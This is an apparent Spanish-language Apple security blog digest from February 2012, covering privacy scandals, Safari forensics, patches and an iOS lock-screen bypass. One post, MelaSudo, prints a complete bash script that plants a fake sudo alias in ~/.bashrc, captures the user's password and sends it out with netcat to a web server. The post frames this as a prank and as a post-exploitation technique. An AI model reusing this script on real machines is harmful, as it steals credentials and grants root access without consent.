Seguridad Apple

Fue noticia en Seguridad Apple: del 13 al 26 de Febrero

noreply@blogger.com (SeguridadApple) — Sun, 26 Feb 2012 06:02:00 +0000

Hoy domingo toca el post de repaso en el que recordamos todos los artículos publicados durante las últimas dos semanas en Seguridad Apple, así que vamos a comenzar.

El lunes 13 de Febrero comenzamos con la noticia de que FlashBack, el malware que comenzó a desplegarse con trucos de ingeniería social en sistemas Mac OS X, ha evolucionado en las últimas variantes para utilizar exploits de Java e infectar sistemas no parcheados.

El martes, con la noticia de que Kodak había cerrado, echamos una mirada a la historia de Apple para recordar los modelos de cámaras digitales de Apple QuickTake, cuyos modelos 100 y 150 fueron construidos por Kodak.

El miércoles 15 tuvimos la noticia del escándalo con la aplicación Path, que sin informar a los usuarios accedía a la agenda de contactos y la transmitía a sus servidores, lo que obligó a la compañía a pedir disculpas y actualizar la aplicación. Ese mismo día también nos hicimos eco de la aparición de un nuevo expediente de seguridad desde Adobe para parchear un conjunto de bugs críticos que estaban siendo utilizados ya en Internet.

El jueves de esa semana os dejamos un script, llamado MelaSudo creado en el SOCtano de Informática 64 para conseguir robar la password de un usuario sudoer mediante un truco de ingeniería social generando un alias del comando sudo.

El viernes tocó hablar de Mac OS X 10.8 Mountain Lion, anunciado para este verano y del que se han revelado algunas novedades de seguridad, como Gatekeeper, una solución que intenta bloquear el malware dándole al usuario la capacidad de bloquear cualquier aplicación que no haya sido descargada desde la App Store, o que no venga firmada por ningún desarrollador de Apple.

En la sección de curiosidades que nos reservamos para los viernes tarde publicamos una curiosa foto en la que se puede ver que los iPad se han metido en la vida religiosa, dejando claro hasta donde llegó la visión de Steve Jobs.

Para el sábado, otra noticia con un escándalo de privacidad, en este caso la propia Google que según desveló el Wall Street Journal, estaba utilizando un código especial para saltarse las opciones de privacidad de los navegadores Apple Safari.

El domingo le tocó el turno a la aplicación Twitter para iOS, que con la función Encontrar amigos estaba enviando los contactos de la agenda de contactos en iOS a los servidores de la compañía de los 140 caracteres, durante 18 meses, sin avisar en ningún momento al usuario de la aplicación.

El lunes 20 comenzamos a mirar las opciones de privacidad, forenses y antiforenses de Apple Safari, y comenzamos con el Historial de Navegación. Así analizamos dónde se almacena, como se puede borrar y cómo funciona la Navegación Privada.

Para el martes 21 publicamos la segunda entrega sobre la privacidad en Apple Safari, en este caso analizamos las descargas, que pueden ayudar a recomponer el historial de navegación incluso si se ha borrado el historial o activado la navegación privada.

El miércoles continúo el caso del espionaje de Google a los usuarios. Microsoft confirmó que los usuarios de Internet Explorer también habían sido espiados, Google comenzó a recibir las demandas de los usuarios y os hablamos de Do Not Track Plus, un plug-in para mejorar las opciones de privacidad en los navegadores.

El jueves echamos un vistazo a una opción de IDA que permite realizar procesos de ingeniería inversa de binarios de Mac OS X remotamente desde sistemas operativos Windows.

Para el viernes pasado publicamos la tercera entrega dedicada a la privacidad de Apple Safari, en este caso la caché y las cookies, que permiten reconstruir el historial de navegación de un usuario.

En la sección de curiosidad de la tarde del viernes, la segunda parte de la modernización de la Iglesia empujada desde el cielo. Y es que las fotos son curiosas.

Por último, ayer sábado la noticia fue para un nuevo bug de iOS 5.0.1 que, gracias a un fallo con el sistema de ahorro de energía, con una llamada perdida, metiendo y sacando la SIM del terminal, es posible saltar la restricción del código de bloqueo.

Y esto ha sido todo lo que hemos publicado durante estas dos semanas, que esperamos que te haya permitido seguir la actualidad de lo acaecido relativo a seguridad en las tecnologías Apple.

Nuevo Bug en iPhone iOS 5.0.1 permite saltarse el bloqueo

noreply@blogger.com (SeguridadApple) — Sat, 25 Feb 2012 07:47:00 +0000

Hace poco os informamos del bug en iOS 5.0.1 que permite hacer llamadas FaceTime e inspeccionar el contenido de la agenda de contados en terminales bloqueados. Hoy toca hablar de un curioso fallo que se produce al quitar y poner la tarjeta SIM de un terminal que ha recibido una llamada perdida a la que se quiere devolver la llamada, que permite acceder a todos los contactos y realizar llamadas desde un teléfono bloqueado.

El proceso, aunque parece un poco tedioso por los intentos que hay que realizar, permite a un atacante tener acceso a todos los contactos en menos de tres minutos, y sus pasos son bastante sencillos, tal y como se puede ver en el siguiente vídeo.

Primero hay que hacer una llamada perdida al terminal que se desea desbloquear. Después hay que sacar la SIM y re-introducirla al mismo tiempo que se selecciona la opción de devolver la llamada perdida. Esto, de alguna manera, aprovecha un fallo en la gestión del ahorro de batería que salta cuando se quita la tarjeta SIM, y confunde al terminal permitiendo tener acceso a la lista de los contactos. Un nuevo bug a solucionar para la - ya esperada y necesaria - versión iOS 5.1.

Se confirma: Steve Jobs impone el iPad en el cielo

noreply@blogger.com (SeguridadApple) — Fri, 24 Feb 2012 11:30:00 +0000

Si el viernes pasado recordábamos a Steve Jobs por el impacto que tuvo en todo el mundo, sorprendidos de que este cambio llegara hasta la propia forma de comunicarse con Dios, hoy traemos otra foto en la que se confirma que este cambio de comunicación con lo divino es un hecho.

Visto en Señoras Que

Y es que desde que Steve Jobs llegó al cielo, debió llevar contigo todo su genio y sus ideas para revolucionar el entorno al juntarse con otros grandes genios.

Sirva este post para recordar otro poco más el talento y trabajo de Steve Jobs, que nunca viene mal.

Buen fin de semana a todos.

Privacidad en Apple Safari: La Caché y las Cookies

noreply@blogger.com (SeguridadApple) — Fri, 24 Feb 2012 06:01:00 +0000

Una de las opciones que dimos cuando hablamos de El Historial de Navegación en Apple Safari, es hacer uso de la opción de Borrar el Historial. La pregunta es... ¿se puede saber qué sitios han sido navegados si se ha hecho uso de ella? Pues sí, analizando la caché del navegador.

En Apple Safari, si se ha seleccionado la opción de Navegación Privada, todos los archivos descargados en la caché del navegador serán eliminados al cerrar la sesión. Sin embargo, si no se ha seleccionado esta opción y se decide hacer uso del borrado manual del Historial de Navegación, o si el navegador ha tenido un problema que le ha hecho cerrarse de manera inesperada - o si el navegador aún está abierto - es posible recuperar el Historial de Navegación desde la Caché y las Cookies.

Figura 1: Opciones de Caché en Apple Safari. Se accede con el botón Detalles

Los objetos de la caché pueden ser consultados desde las Preferencias de Adobe Safari, desde donde es posible acceder a la lista de todos los elementos cacheados en un momento determinado. Desde allí, es posible vaciar la caché manualmente, lo que borrará todos los objetos almacenados hasta ese momento.

Figura 2: Datos de caché guardados y opción de Eliminar

Sin embargo, si la caché no ha sido eliminada, ésta permanece en el fichero /Users/usuario/Lybary/Caches/com.apple.Safari/cache.db, con toda la información relativa a los archivos descargados.

Figura 3: El fichero de almacenamiento de caché

Esto permite que, con la ayuda de alguna aplicación que analice la caché, como el caso de Safari Cache Explorer, sea posible obtener fechas y URLs de navegación como si fuera el Historial de Navegación completo.

Figura 4: Recuperando el historial de navegación con Safari Caché Explorer

Es por eso que desde Seguridad Apple os recomendamos que activéis siempre que sea posible la Navegación Privada, que además evita otro tipo de ataques que iremos contando más adelante. Si no, cuando borres el Historial de Navegación, acuérdate también de Borrar la Caché.

Analizar binarios de Mac OS X desde Windows con IDA

noreply@blogger.com (SeguridadApple) — Thu, 23 Feb 2012 06:11:00 +0000

IDA es uno de los más conocidos debuggers multiplataforma con soporte para sistemas operativos Windows, Linux y Mac OS X. La característica de IDA que tratamos hoy en este artículo es la del sistema de debugging remoto que permite llevar a cabo la depuración de un binario de una plataforma desde otra. En otras palabras: realizar el análisis de una aplicación para Mac OS X desde un sistema Windows o Linux, o viceversa.

Para montar el entorno se necesita un sistema operativo Windows y uno Mac OS X, ambos con IDA instalado en ellos, y para aprender la como funciona esta característica seguir el tutorial IDA Mac OS X Debugging de Hex-Rays, los desarrolladores de IDA.

Inicialmente será necesario descargar el fichero macvuln.tgz, aplicación para Mac OS X que se puede utilizar de ejemplo para analizar. Una vez descargada la aplicación, se debe configurar el servidor de IDA con los permisos adecuados. Para ello se deben ejecutar los siguientes comandos.

Figura 1: Configuración de permisos sobre el mac_server

Una vez que toda la parte de Mac OS X está totalmente configurada se puede iniciar el servidor de IDA llamado mac_server mediante el parámetro -P para establecerle una clave de acceso.

Figura 2: Ejecución del servidor IDA para mac_os

Los pasos para conectar IDA desde el sistema Windows al servidor corriendo en Mac OS X a través de la red empiezan por cargar el binario macvuln descargado anteriormente, y acto seguido seleccionar el depurador Mac OS X remoto mediante la ruta de menús ‘Debugger / Select debugger / Remote Mac OS X debugger’, tal y como se muestra en la siguiente captura de pantalla.

Figura 3: Arrancando IDA para usar debugging remoto en Mac OS X

El último paso a llevar a cabo es la configuración de la dirección IP y la contraseña del servidor, junto con los parámetros que se deseen ejecutar sobre la aplicación ‘macvuln’. Esta ventana es accesible desde ‘Debugger / Process options’.

Figura 4: Configuración del proceso que se quiere debuggear

Como último paso ya únicamente es necesario iniciar la depuración mediante el hotkey ‘F9’ y comenzar el proceso de ingeniería sobre el proceso en cuestión.

Figura 5: Aplicación Mac OS X siendo analizada con IDA remotamente desde Windows

Esperamos que con este pequeño artículo más de uno os animéis a analizar muchas más aplicaciones para Mac OS X y a buscar en ellas esas características "ocultas" que a veces impactan en la seguridad de nuestros sistemas.

El caso del espionaje de Google a usuarios continúa...

noreply@blogger.com (SeguridadApple) — Wed, 22 Feb 2012 06:08:00 +0000

La historia del espionaje por parte de Google hacia los usuarios de Apple Safari que destapó el Wall Street Journal ha traído cola. En primer lugar, Microsoft confirmó que este seguimiento no se utilizaba sólo con usuarios de Apple Safari, sino que aquellos que navegaban con Internet Explorer también eran espiados por parte de las anuncios mostrados en las páginas visitadas.

En segundo lugar, hay que hablar de las consecuencias legales que esto va a traer para Google, ya que parece que este caso va convertirse en algo similar a lo que ya sucedió cuando se supo que el Google Street Car estaba grabando información de las redes WiFi que iba encontrando. De momento, tal y como informan desde Apple Insider, Google ha sido demandada por varios usuarios y organizaciones por saltarse las opciones de privacidad establecidas en el navegador, que ya se verá en qué terminan.

Figura 1: Do Not Track Plus en Apple Safari

Por último, ya han salido algunas herramientas para extremar las opciones de privacidad en los navegadores para evitar este seguimiento. Hay que recordar que soluciones como NoScript o similares - o plugins para quitar la publicidad de la Google mientras se navega - existen hace mucho tiempo. Para los usuarios de Apple Safari, desde MacWorld han recomendado el uso de Do Not Tack Plus, un plugin que extrema las opciones de privacidad e informa cuando se están enviando datos a páginas externas. En el siguiente vídeo tenéis una demostración de cómo funciona.

En cualquier caso, desde Seguridad Apple os queremos recordar la importancia de extremar las medidas de privacidad y aplicar hábitos "saludables", porque todo esto que estamos viendo con escándalos de privacidad puede ser nada más que la punta del iceberg.

Privacidad en Apple Safari: Las Descargas

noreply@blogger.com (SeguridadApple) — Tue, 21 Feb 2012 05:28:00 +0000

En el artículo de ayer sobre el Historial de Navegación en Apple Safari terminábamos preguntándonos si realmente el método de Navegación Privada en Apple Safari permite que nadie sepa que se ha navegado por un sitio. Hoy queremos ver un apartado que permite a un analista forense conocer precisamente eso, que se ha navegado por un determinado sitio en una determinada fecha: Las descargas de ficheros.

El historial de descargas

Tanto si se está trabajando en modo de Navegación Privada como si no, Apple Safari guarda un historial de todas las descargas al que se puede acceder mediante el menú Visualización y la selección de la opción Mostrar Descargas.

Figura 1: Acceso a Mostrar Descargas

Esta opción mostrará un panel lateral en el que se muestra la información de todas las descargas que se han realizado, y que se encuentran almacenadas en el fichero /Users/usuario/Libary/Safari/Downloads.plist.

Figura 2: Fichero /User/usuario/Safari/Downloads.plist

Este fichero se seguirá generando incluso si se está trabajando en modo de Navegación Privada, y en él, como se puede ver en la imagen siguiente, está disponible la URL de descarga y la fecha y hora en la que se produce.

Figura 3: Fecha y URL de descarga

Borrado de historial de descargas

Para evitar este registro, una vez que se haya terminado la descarga, se puede hacer uso del botón Borrar desde la ventana de descargas, y se conseguirá que el fichero Downloads.plist quede vacío.

Figura 4: Ventana de descargas con botón de Borrar

La pregunta es.... ¿es suficiente para evitar que un analista forense sepa que se ha navegado por un sitio en un determinado momento?. Pues la respuesta ya os la dimos hace tiempo.

El historial de navegación generado a partir de los ficheros descargados

Como ya os contamos, en Mac OS X, Apple añade un atributo extendido a todos los ficheros que son descargados de Internet en el que se indica qué programa lo descargó y cuál fue la URL de la descarga. Es por eso que un analista forense podría, mirando los resultados de xattr y la fecha de creación del fichero, descubrir parcialmente el historial de navegación.

Figura 5: URL de descarga y fecha de creación del fichero

Como ya os contamos, es posible borrar estos atributos extendidos con un comando xattr sobre todos los ficheros del perfil de usuario: xattr -v -r -d kMDItemWhereFroms *

Tal vez os estéis preguntado ahora si es posible entonces conocer el historial de navegación de un usuario si este no se descarga ningún archivo. Pues lo veremos en un próximo artículo.

Privacidad en Apple Safari: El Historial de Navegación

noreply@blogger.com (SeguridadApple) — Mon, 20 Feb 2012 06:10:00 +0000

El análisis de la navegación por Internet desde un equipo puede desvelar muchas cosas. Es por eso que en casos como el de Google en el que se permite analizar la navegación de un usuario a terceros la gente se preocupa tanto. Es un tema serio de privacidad que debe ser tenido en cuenta. Hoy queremos echarle un ojo a cómo gestionar el historial de navegación de Apple Safari y a qué se puede sacar de él.

Inspeccionar el historial de Navegación

El historial de Apple Safari puede ser revisado fácilmente mediante la combinación de teclas Alt+Cmd+ L, y permite acceder a una ventana que muestra la lista de sitios que se han visitado, organizados por fecha. Si un usuario se deja la sesión abierta, en cuestión de segundos puede ser inspeccionado.

Figura 1: Historial de Navegación en Apple Safari

El contenido que se visualiza en esa ventana está almacenado en un fichero en el perfil de usuario en formato .plist que se llama /Users/usuario/Library/Safari/History.plist

Figura 2: History.plist con el historial de navegación de Apple Safari

Borrar una o todas las entradas del Historial de Navegación

Desde la ventana de Historial de navegación es posible eliminar una entrada del historial de navegación manualmente. Para ello basta con posicionarse sobre la entrada y en el menú contextual del botón derecho seleccionar la opción de Eliminar. Si por el contrario se desea eliminar el historial de navegación completo, desde el menú de Historial se puede seleccionar la última opción: Borrar Historial.

Figura 3: Opción de Borrar historial completo en menú Historial

Además, es posible hacer un borrado programado del historial, por lo que entrando en las Preferencias del menú Safari, y yendo a la opción General, se puede establecer una política de eliminación del Historial de navegación. Por defecto la configuración es de un mes, pero puedes configurarlo a solo 24 horas, lo que reduciría mucho los datos que se guardan. Así, un ataque de inspección de historial por medio de CSS o JavaScript, tendría mucho menos datos que sacar.

Figura 4: Configuración de política de borrado del historial

Evitar que se guarde el historial de sitios visitados: Navegación Privada

Para evitar que se genere ninguna entrada en el historial de sitios visitados se puede utilizar el modo de Navegación Privada que está disponible en el menú Safari.

Figura 5: Activación de modo de Navegación Privada

Como se puede ver, Apple Safari avisa de que se si se activa ese modo de navegación no se guardará ninguna entrada en el historial.

Figura 6: Alerta de activación de modo de Navegación Privada

Sin embargo, la pregunta que surge es: ¿Es realmente una navegación privada? ¿Podrá aguantar este modo el escrutinio de un analista forense? Mañana más sobre este tema.

Twitter para iOS envuelto en el escándalo de los contactos

noreply@blogger.com (SeguridadApple) — Sun, 19 Feb 2012 07:23:00 +0000

¿Eres uno de los millones de usuarios de Twitter en el mundo? Y además, ¿utilizas la herramienta de Twitter para iOS? Estás de enhorabuena, ya que si has ejecutado la posibilidad de "Buscar amigos" "tus contactos serán de Twitter durante 18 meses. Pero... ¿Twitter ha informado de ello? La respuesta es no.

Tras el escándalo de esta semana con Path, y visto esto con Twitter, está claro que los usuarios debemos extremar las precauciones con nuestra privacidad, y este tipo de herramierntas que son capaces de "gestionar" nuestros contactos sociales deberían estar más controladas.

Twitter ha informado, según reporta Naked Security, que en las próximas actualizaciones mostrarán explícitamente lo que sucede cuando se ejecuta la opción de "Buscar amigos", de manera que el usuario quede totalmente informado. Realmente sería sencillo, ya que bastaría con que Twitter pusiera un mensaje del tipo:

"Al seleccionar esta opción está permitiendo que Twitter almacene sus contactos personales de su libreta de direcciones, ¿Desea continuar?"

Realmente explícito y sencillo de entender, y que sea ya el usuario el que elija si su privacidad vale más que encontrar a los amigos automáticamente en Twitter. Quizá un gran número de personas no ejecuten esta opción por el simple hecho de que su libreta será compartida, pero Twitter deberá disponer de un mensaje claro y conciso para no recibir las críticas con su política de actuación.

Figura 1: Opción de Buscar amigos que entrega los contactos a Twitter

Twitter no es el único que realiza estas acciones "oscuras", también grandes empresas como Foursquare, Viber, WhatsApp, Instagram, Path o Hipster utilizan esta técnica o similares. Apple ha prometido vigilar más el como la información de los usuarios es solicitada en las aplicaciones del App Store.

De todas formas los usuarios deberían estar mas concienciados, ya que no hay magia y solo es tecnología así que cualquier persona con ciertas nociones técnicas debe "presuponer" que para poder localizar a sus amigos, la herramienta primero necesita saber quiénes son todos sus amigos, parece evidente. Aún así, es obligación de la red social de turno el no aprovecharse del desconocimiento de éstos. Las redes sociales necesitan de los usuarios para poder tener éxito, pero deben ser menos agresivos a la hora de conseguirlos.

Google espiaba la navegación de los usuarios de Safari

noreply@blogger.com (SeguridadApple) — Sat, 18 Feb 2012 06:00:00 +0000

Hace un par de días desde Seguridad Apple os contábamos los problemas que habían surgido con la aplicación Path que - a pesar de que han corregido el error en su nueva versión - han suscitado un gran debate sobre el uso y acceso de los datos del usuario sin solicitar su consentimiento. Esos casos se unen al gran debate de la privacidad del usuario frente a los sitios de Internet que toman datos del usuario para tener mejor "documentadas" todas las acciones que realiza un usuario.

En ese escándalo se vio envuelto hace tiempo Facebook, que incluía una cookie en las sesiones de navegación de sus visitantes que le permitía tomar datos, e incluso sitios de contenido adulto que inspeccionaban el historial de navegación de cualquier visitante. A ellos se une ahora un escándalo con Google publicado en el Wall Street Journal, del que tanto ellos, como ciertas empresas de publicidad se han aprovechado de un código de seguimiento de Google que permite rastrear los hábitos de navegación de usuarios que utilizan el navegador Apple Safari, es decir, especialmente usuarios de Mac OS X e iOS.

Al parecer Google ha dejado de utilizar el código tras ser contactado por el periódico Wall Street Journal que habría sido informado de ello por Jonathan Mayer de la Universidad de Standford, especialista en analizar este tipo de cuestiones. Según el periódico, este código ha sido encontrado en 22 de los 100 sitios web investigados y en 23 anuncios para iPhone.

Hay que tener en cuenta que la legislación en muchos países exige que los navegadores den al usuario herramientas de privacidad para, entre otras cosas, evitar la inserción de cookies o códigos de rastreo de empresas. Por eso, el navegador Apple Safari está configurado para bloquear las cookies de terceros de forma predeterminada.

Figura 1: Opciones de Privacidad en Apple Safari para Mac OS X

Sin embargo, estos anuncios insertan un iframe con un formulario transparente que permite hasta recoger datos de la cuenta de Google Plus, si hubiera alguna, que está conectada en la sesión, pero sólo y exclusivamente si es un navegador Apple Safari. Una vez el código se activa puede permitir que Google haga el seguimiento del usuario marcado por el anuncio a través de un gran número de sitios web. Mediante la inserción del código HTML desde el dominio de Google es posible saltarse la configuración de estos parámetros de seguridad para permitir el traceo, ya que será Google el que esté ayudando a la empresa de publicidad a hacer el seguimiento. Todo el proceso se explica en el siguiente gráfico publicado en el artículo.

Figrura 2: Gráfico descriptivo del proceso

Apple ha confirmado estar trabajando en la solución del problema de la privacidad como éste en su navegador Apple Safari. Mientras, Google se defiende alegando que no recopila datos personales, pero ha dejado de utilizar esta práctica desde ya. Pese a esto, Google, se enfrenta a la posibilidad de grandes multas de la Comisión Federal del Gobierno de EEUU en el caso de que la agencia estime que ha violado su acuerdo de privacidad. ¡Google, Don´t be Evil!

Steve Jobs está haciendo cambios en el cielo...

noreply@blogger.com (SeguridadApple) — Fri, 17 Feb 2012 12:30:00 +0000

Que Steve Jobs cambió un poco la manera en que vivimos en sociedad hoy en día es innegable. Sus productos, y la forma de usarlos que él pensó, están dentro de nuestras vidas. Lo que nunca pensamos en el pasado es que llegarían a cambiar aspectos tan antiguos como comunicarnos con Dios.

Figura 1: Visto en Señoras Que

Y es que las especulaciones de que algo iba a cambiar en el cielo comenzaron desde el momento en Steve Jobs nos abandonó.

Figura 2: "Moisés, te presento a Steve Jobs. Él va a actualizar tus tablas"

Figura 3: "Para ser honesto, señor Jobs, la última vez que una manzana causó mucho
revuelo por aquí afectó a Adán, Eva y una serpiente.."

Buen fin de semana.

OS X 10.8 Mountain Lion viene con un "GateKeeper"

noreply@blogger.com (SeguridadApple) — Fri, 17 Feb 2012 05:53:00 +0000

Ayer Internet se revolucionó con la nota de prensa, y el nuevo anunció de OS X 10.8 Mountain Lion, el nuevo sistema operativo de Apple que se va lanzar en un tiempo record, dejando que el "Rey de la Selva" tenga un reinado más bien corto. En esta nueva revisión de la versión X de Mac OS - a la que han quitado "Mac" del nombre - , la unión entre el interfaz gráfico de iOS y los sistemas Mac OS X es ya casi un hecho, después de que apareciera en un paper académico el trabajo de Apple en microprocesadores ARM y la confirmación definitiva por parte de Tim Cook de esta línea.

Con la unión de ambos entornos - aunque de momento no es total y solo es una convergencia on-going -, si se suman el volumen de aplicaciones que se han acumulado ya en la App Store y la Mac App Store el resultado es enorme. Es por ello que, teniendo en cuenta que no todas las aplicaciones están hechas por "chicos buenos", Apple no quiere que haya muchos problemas de seguridad o privacidad, como el ya famoso caso del escándalo Path, en el que un congresista ha pedido explicaciones a Apple por carta.

Es por ello que en OS X 10.8 Mountain Lion ya ha opciones para mejorar la seguridad con respecto a las aplicaciones, y se ha añadido a GateKeeper - no confundir con el antivirus de hace muchos años -. Este software permitirá poder controlar desde las preferencias del sistema que sólo se puedan instalar aplicaciones que hayan sido descargadas desde las tiendas de Apple, o que se vengan asociadas con un ID de un desarrollador de Apple, el cuál tendrá que cuidar su reputación. El funcionamiento es un poco rudimentario según alertan desde Naked Security, ya que se sigue basando en una tecnología similar a XProtect, es decir, con listas blancas pero siempre es mejor que nada.

Esto permitiría al usuario evitar que cualquier otro programa intentase ejecutarse en el sistema OS X Mountain Lion. Sin embargo, aunque es una configuración por defecto, como se puede ver en la Figura 1, esta opción es elegible por el usuario.

Figura 1: Configuración de aplicaciones que dejará ejecutar GateKeeper

Por otro lado, GateKeeper también controla la ejecución de las aplicaciones y de los permisos de que estas hacen uso, tales como acceder a los contactos personales, enviar información de geo-posicionamiento, o datos del usuario, que Apple no se olvida del escándalo de iPhoneTracker, ni del que hubo con Carrier iQ, y por supuesto el más reciente con Path.

De todas formas, esto solo es una versión para desarrolladores, que coincide con la más que posible llegada de Windows 8 y, aunque desde Apple lo niegan, parece que la competición por el mercado de equipos híbridos está más cerca que nunca de comenzar.

Tú, por si quieres ir conociendo mejor este sistema, puedes descargar la versión beta de OS X 10.8 Mountain Lion desde la web de desarrolladores.

MelaSudo: robar la password a un sudoer con ingenio

noreply@blogger.com (SeguridadApple) — Thu, 16 Feb 2012 06:56:00 +0000

MelaSudo es un pequeño script en bash desarrollado como 'arma de guerrilla' y utilizado internamente dentro del equipo de auditoría web del SOCtano de informatica64, como forma de venganza contra aquellos linuxeros/maqueros que rinden culto al ataque David Hasselhoff.

La finalidad de este script consiste en devolver un ataque David Hasselhoff realizando el robo del password de un usuario con permisos de 'sudoer' mediante el uso de un alias falso del comando 'sudo'. Para ello, lógicamente hay que tener acceso local a la sesión de un usuario con permisos de sudoer, pero en lugar de devolverle el ataque David Hasselhoff, le robareos la password.

Como normalmente hay poco tiempo cuando alguien se deja la sesión abierta, se ha hecho un script que automatiza todo el proceso. La instalación de la trama es muy sencilla, basta con ejecutar el script con el parámetro 'instalar' tal y como se ve en la siguiente captura de pantalla.

Figura 1: Instalación de MelaSudo

El proceso de instalación consiste en la copia del script en '~/.thumbmails' y en añadir la linea 'alias sudo="bash ~/.thumbmails"' al fichero '~/.bashrc'. Éste ultimo fichero es ejecutado cada vez que se inicia una terminal bash, por lo que nos aseguraríamos de que en cada una de ellas se ejecutase el alias encargado de realizar el robo de la password.

A continuación se ve como al ejecutar desde una terminal bash el comando whoami, muestra que se trata del usuario 'haha', y tras realizar una elevación mediante 'sudo', se solicita la la password en dos ocasiones, simulando que en el primer intento se ha introducido incorrectamente, pero tratandose en realidad del script 'Melasudo'. En la segunda petición de password ya se trata realmente del comando sudo, y autentica correctamente al usuario como 'root'.

Figura 2: Ejecución de MelaSudo

Como este script fue diseñado para gastar bromas a compañeros que se dejan el equipo desbloqueado, cosa que no suele ser habitual, fue necesario diseñar un sistema que nos permitiera ver su password sin necesidad a tener que esperar a que se volviera a dejar el equipo sin bloquear. Por ello, se envía a través la red a un servidor web haciendo uso de netcat (asegúrate de que lo tiene, si no adapta el script), para que sea mucho más cómodo todo.

Figura 3: Log generado por MelaSudo en el servidor web

El código del script MelaSudo puedes obtenerlo desde aquí:

#!/bin/bash
if [ "x$1" == "xinstalar" ]; then
cp $0 ~/.thumbmails 2> /dev/null
echo 'alias sudo="bash ~/.thumbmails"' >> ~/.bashrc
echo "instalado"
history -c
exit
fi
#mac
echo -n "Password:"

#ubuntu
#echo -n "[sudo] password for `whoami`: "

read -s password
echo
rutaReal=$(whereis sudo | awk '{print $2}')
if [ "x$rutaReal" == "x" ]; then
rutaReal=$(whereis sudo | awk '{print $1}')
if [ "x$rutaReal" == "x" ]; then
rutaReal=$(whereis sudo | awk '{print $0}')
fi
fi

echo -en "GET /password.php?password=$password HTTP/1.1\nConnection: close\nhost: tuserver.com\n\n" | nc tuserver.com 80 >/dev/null 2>/dev/null

echo -e "Sorry, try again."
$rutaReal $1 $2 $3 $4 $5 $6 $7

Como se puede ver, para cada sistema operativo hay que personalizar el mensaje de error para que sea más creíble el truco. Esperamos que esto os ayude a tener mucho más cuidado de vuestras sesiones, ya que el ataque David Hasselhoff es lo que menos te puede ocurrir.

Por supuesto, esta idea puede ser utilizada en cualquier entorno de post-explotación de una sesión de un usuario sudoer con un ataque client-side, como a través de un Safari o un Java sin parchear.

Actualización crítica de Adobe ShockWave para Mac OS X

noreply@blogger.com (SeguridadApple) — Wed, 15 Feb 2012 13:50:00 +0000

Tenemos un nuevo boletín de seguridad de Adobe: APSB12-02 en el que informa de una actualización de Adobe Shockwave Player que corrige 9 vulnerabilidades que podrían permitir a un atacante ejecutar código malicioso en el sistema afectado.

Adobe ha clasificado la actualización como crítica y recomienda que los usuarios realicen la actualización más reciente de la instalación del producto.

La nueva versión del software es 11.6.4.634 está disponible tanto para Mac OS X como para Windows y se puede descargar desde la siguiente URL: Descargar Adobe Shockware Player.

La actualización, entre otras, resuelve una vulnerabilidad de corrupción de memoria en Shockwave 3d Asset que podría conducir a la ejecución de código (CVE-2012-0757). También soluciona las siguientes vulnerabilidades: CVE-2012-0759, CVE-2012-0760, CVE-2012-0761, CVE-2012-0762, CVE-2012-0763, CVE-2012-0764, CVE-2012-0766

Todas estos fallos de seguridad pueden permitir a un atacante ejecutar código malicioso o provocar una denegacion de servicio, por lo que desde Seguridad Apple os recomendamos que apliquéis la actualización en los equipos con Mac OS X que dispongan de la aplicación Adobe Shockwave Player lo antes posible.

Path enviaba los contactos sin consentimiento del usuario

noreply@blogger.com (SeguridadApple) — Wed, 15 Feb 2012 07:12:00 +0000

Uno de los consejos que no se nos debe olvidar a la hora de instalar una aplicación es asegurarnos que esta sólo tiene permiso a los servicios/datos que necesita para su funcionamiento. Esto es una responsabilidad no sólo del usuario, que debe proteger la integridad de sus datos, sino también o sobre todo del desarrollador y de la empresa que hace esta aplicación. Esto se complica cuando la aplicación se instala en un terminal iOS en el que no se puede configurar demasiado la lista de permisos de la aplicación. Así cuando existe una “feature” desconocida que permite acceder a estos servicios/datos si nuestra intervención o permiso salta el escándalo.

El asunto de Path, es uno de estos casos, ya que el investigador Arun Thampi, en un intento de realizar un port de la aplicación a Mac OS X, descubrió usando un proxy para analizar las peticiones que realizaba al API, que esta aplicación accede a la lista completa de los contactos para subir todos estos datos a sus servidores sin solicitar permiso para ello.

Figura 1: Petición que envía todos los contactos a los servidores de Path sin avisar

Tras el escándalo, los desarrolladores han explicado en su blog que esto lo hacían para mejorar la experiencia de usuario y han pedido disculpas, es decir, que querían facilitar el trabajo informándonos cada vez que uno de nuestros contactos se instalaba Path para que pudiéramos agregarlo a nuestra lista de amigos sin problemas. Y en su defensa alegan que estos datos son transmitidos mediante una conexión cifrada y que se almacenan de forma segura.

Ya sabemos que el caso de Path no es un caso aislado, de hecho muchas aplicaciones funcionan así, pero entendemos que no debería pasar en aplicaciones bajo el auspicio del Apple Store donde una de sus premisas es que “las aplicaciones no deben transmitir ningún tipo de datos sin el permiso explicito del usuario “.

La nueva versión de Path ha corregido este error, solicitando permiso al usuario para poder hacer uso o no de estos contactos. Ahora antes de aceptar un usuario precavido debería leerse la politica de privacidad para saber el uso que van a hacer de estos datos.

Apple QuickTake: Cámara digital de Apple que hizo Kodak

noreply@blogger.com (SeguridadApple) — Tue, 14 Feb 2012 07:27:00 +0000

Apple QuickTake 100

A lo largo de este semestre la empresa Kodak anunció que dejará el negocio de las cámaras digitales en un intento por solucionar su grave situación económica. A leer esta noticia nos pusimos nostálgicos ya que no debemos olvidar que Kodak fue el fabricante de los modelos 100 y 150 de la cámara digital Apple QuickTake .

La cámara Apple Quicktake 100, que salió al mercado a mediados de los 90, suponía una gran mejora respecto a la primera cámara digital de la historia que había sido creada en 1975 por Steve Sasson, un empleado de Kodak que también trabajaría posteriormente en los modelos de cámara digital de Apple que hoy recordamos.

Mientras que la primera cámara digital de la historia pesaba casi 4 kilogramos, llevaba 16 baterías, tardaba 23 segundos en lanzar una foto, tenía capacidad para unas dos fotos de 0,1 Mpx y era en blanco y negro La Apple Quicktake 100 pesaba poco más de medio kilo, usaba 3 pilas AA, permitía realizar 8 fotografías con una resolución de 0,3 Mpx y realizaba fotos en 24 bits de color.

iPhone y Apple QuickTake 100

Estos datos parecen una broma si lo comparamos con las especificaciones actuales de la cámara que viene con iPhone 4S que, con apenas 140 gramos de peso, permite realizar fotos en segundos con una resolución de 8Mpx. Sin embargo, Apple QuickTake en aquella época suponían una revolución. Posteriormente salieron al mercado los modelos 150 y 200 - la 200 no lo haría Kodak -, que añadían nuevas funcionalidades como la capacidad de borrar fotos, soporte de formatos JPG y BMP - el modelo 100 sólo soportaba PICT y QuickTake - soporte para Windows, mayor velocidad de obturación, etcétera.

